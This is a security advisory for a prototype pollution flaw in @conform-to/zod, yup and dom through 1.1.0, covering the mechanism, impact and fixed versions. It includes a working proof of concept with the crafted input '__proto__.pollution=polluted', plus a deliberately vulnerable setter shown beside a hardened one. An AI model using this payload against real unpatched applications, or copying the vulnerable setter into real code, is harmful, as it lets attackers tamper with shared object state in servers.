Summary
Conform allows the parsing of nested objects in the form of object.property. Due to an improper implementation of this feature, an attacker can trigger prototype pollution by passing a crafted input (for example a form field or query parameter named __proto__.pollution) to the parseWith... functions, such as parseWithZod.
PoC
```javascript
// Reproduces against @conform-to/zod <= 1.1.0 (fixed in 1.1.1).
const { parseWithZod } = require('@conform-to/zod');
const { z } = require("zod");

// Attacker-controlled input: one parameter whose dotted name walks into
// Object.prototype before the leaf key "pollution" is assigned.
const param = new URLSearchParams("__proto__.pollution=polluted");

// The schema does not need to mention the injected key at all.
const schema = z.object({ "a": z.string() });
parseWithZod(param, { schema });

// A freshly created, unrelated object now inherits the attacker's property.
console.log("pollution:", ({}).pollution); // prints "polluted" on vulnerable versions
```
Details
The invocation of the parseWithZod function in the above PoC triggers the setValue function (through getSubmissionContext and parse), which walks the dotted key __proto__.pollution one segment at a time. For that input it executes the following steps, resulting in prototype pollution:
```javascript
let pointer = value;                    // the object being filled from the submission
pointer.__proto__ = pointer.__proto__;  // "__proto__" already exists, so it is kept: Object.prototype
pointer = pointer.__proto__;            // the walk now points at Object.prototype
pointer.pollution = "polluted";         // the leaf write lands on Object.prototype
```
This is caused by the lack of object existence checking on line 117 in formdata.ts: the code only checks whether pointer[key] is already present, which for the key __proto__ is always true (it resolves to Object.prototype), and never rejects keys that walk into a prototype.
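To make the mechanism concrete, the following is an added example and not Conform's own code: a minimal model of a dotted-path setter with the same existence-only check described above, beside a hardened variant that refuses prototype-walking keys and only reuses intermediate containers that are the target's own properties. The names getPaths, setValueVulnerable, setValueHardened and demo are assumptions made for this example, and the query string fed through both setters is constructed.

```javascript
// Added example, not Conform's code: a minimal model of the dotted-path setter
// the advisory describes, beside a hardened variant. The function names here
// (getPaths, setValueVulnerable, setValueHardened, demo) are assumptions.

// Split "a.b[0].c" into path segments; numeric bracket indices become numbers
// so the setter can allocate arrays for them.
function getPaths(name) {
  const paths = [];
  for (const part of name.split('.')) {
    const m = part.match(/^([^\[]*)((?:\[\d+\])*)$/);
    if (!m) throw new Error(`Unsupported path segment: ${part}`);
    if (m[1]) paths.push(m[1]);
    for (const idx of m[2].matchAll(/\[(\d+)\]/g)) paths.push(Number(idx[1]));
  }
  return paths;
}

// Vulnerable shape: an intermediate segment is reused whenever pointer[key]
// already holds anything, and pointer["__proto__"] always does (it is
// Object.prototype), so the walk climbs into the shared prototype and the
// final write lands there.
function setValueVulnerable(target, name, value) {
  const paths = getPaths(name);
  let pointer = target;
  for (let i = 0; i < paths.length; i++) {
    const key = paths[i];
    if (i === paths.length - 1) {
      pointer[key] = value;
    } else {
      const nextKey = paths[i + 1];
      pointer[key] = pointer[key] ?? (typeof nextKey === 'number' ? [] : {});
      pointer = pointer[key];
    }
  }
  return target;
}

// Hardened shape: reject the keys that reach a prototype, and only reuse an
// intermediate container that is the pointer's own property, never one
// inherited from Object.prototype (e.g. "toString"), which the vulnerable
// version would otherwise descend into and mutate as well.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function setValueHardened(target, name, value) {
  const paths = getPaths(name);
  let pointer = target;
  for (let i = 0; i < paths.length; i++) {
    const key = paths[i];
    if (typeof key === 'string' && FORBIDDEN_KEYS.has(key)) {
      throw new Error(`Refusing to set prototype-walking key "${key}" in "${name}"`);
    }
    if (i === paths.length - 1) {
      pointer[key] = value;
    } else {
      const nextKey = paths[i + 1];
      if (!Object.prototype.hasOwnProperty.call(pointer, key)) {
        pointer[key] = typeof nextKey === 'number' ? [] : {};
      }
      pointer = pointer[key];
    }
  }
  return target;
}

// Feed the same constructed query string through both setters and report what
// a fresh, unrelated object inherits afterwards. The vulnerable run is cleaned
// up so the rest of the process is not left polluted.
function demo() {
  const params = new URLSearchParams('__proto__.pollution=polluted&a=ok');
  const result = {};

  const vulnerableTarget = {};
  for (const [key, value] of params) setValueVulnerable(vulnerableTarget, key, value);
  result.vulnerableLeaked = ({}).pollution;   // "polluted" on an unrelated object
  delete Object.prototype.pollution;

  const hardenedTarget = {};
  result.rejected = [];
  for (const [key, value] of params) {
    try {
      setValueHardened(hardenedTarget, key, value);
    } catch (err) {
      result.rejected.push(err.message);
    }
  }
  result.hardenedLeaked = ({}).pollution;     // undefined
  result.hardenedTarget = hardenedTarget;     // { a: "ok" }
  return result;
}

console.log(demo());
```

The hasOwnProperty check matters beyond __proto__: a name such as toString.x would otherwise make the vulnerable setter reuse the inherited Object.prototype.toString function as its container and attach properties to a builtin shared by every object, which the hardened variant avoids by allocating a fresh own object instead.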
Impact
Any application that passes attacker-controlled form data or URL parameters to conform's server-side parsing is affected: a single crafted field name lets the attacker add or overwrite properties on Object.prototype for the whole process, and every later object lookup in that process inherits them.
Package | Affected Version |
---|---|
@conform-to/zod | <= 1.1.0 |
@conform-to/yup | <= 1.1.0 |
@conform-to/dom | <= 1.1.0 |

Package | Fixed Version |
---|---|
@conform-to/zod | = 1.1.1 |
@conform-to/yup | = 1.1.1 |
@conform-to/dom | = 1.1.1 |
- ID: NPM:GHSA-624G-8QJG-8QXF
- Severity: high
- URL: https://github.com/advisories/GHSA-624g-8qjg-8qxf
- Published: 2024-04-23T21:15:55
- Modified: 2024-04-23T21:15:57
- Rights: NPM Security Team
Type | Package URL | Namespace | Name / Product | Version | Distribution / Platform | Arch | Patch / Fix |
---|---|---|---|---|---|---|---|
Affected | pkg:npm/%40conform-to/zod | @conform-to | zod | <= 1.1.0 | | | |
Fixed | pkg:npm/%40conform-to/zod | @conform-to | zod | = 1.1.1 | | | |
Affected | pkg:npm/%40conform-to/yup | @conform-to | yup | <= 1.1.0 | | | |
Fixed | pkg:npm/%40conform-to/yup | @conform-to | yup | = 1.1.1 | | | |
Affected | pkg:npm/%40conform-to/dom | @conform-to | dom | <= 1.1.0 | | | |
Fixed | pkg:npm/%40conform-to/dom | @conform-to | dom | = 1.1.1 | | | |